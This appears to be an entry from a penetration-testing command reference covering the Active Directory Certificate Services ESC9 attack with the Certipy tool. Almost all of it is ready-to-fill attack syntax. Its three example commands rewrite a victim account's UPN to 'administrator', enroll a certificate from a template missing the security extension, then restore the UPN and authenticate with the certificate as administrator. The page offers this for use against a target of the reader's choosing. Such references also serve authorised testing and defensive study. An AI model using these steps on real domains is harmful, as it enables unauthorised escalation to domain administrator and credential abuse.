Certipy ESC9 (No Security Extension)

ESC9: certificate template has CT_FLAG_NO_SECURITY_EXTENSION, so the new szOID_NTDS_CA_SECURITY_EXT is not embedded. Combined with GenericWrite over a victim user, change their UPN to a target (e.g. administrator), enroll, then revert UPN and authenticate with the cert.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP, KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -template '<template>' -upn '<target>@<domain>'

Examples

# 1. Set victim UPN to administrator
certipy account update -u attacker@corp.local -p Pass -user victim -upn administrator
# 2. Request cert as victim
certipy req -u victim@corp.local -p VictimPass -dc-ip 10.10.10.10 -ca 'CORP-CA' -template ESC9-Template
# 3. Restore UPN and auth with cert
certipy auth -pfx administrator.pfx -domain corp.local

Tags

certipy adcs esc9 upn genericwrite

References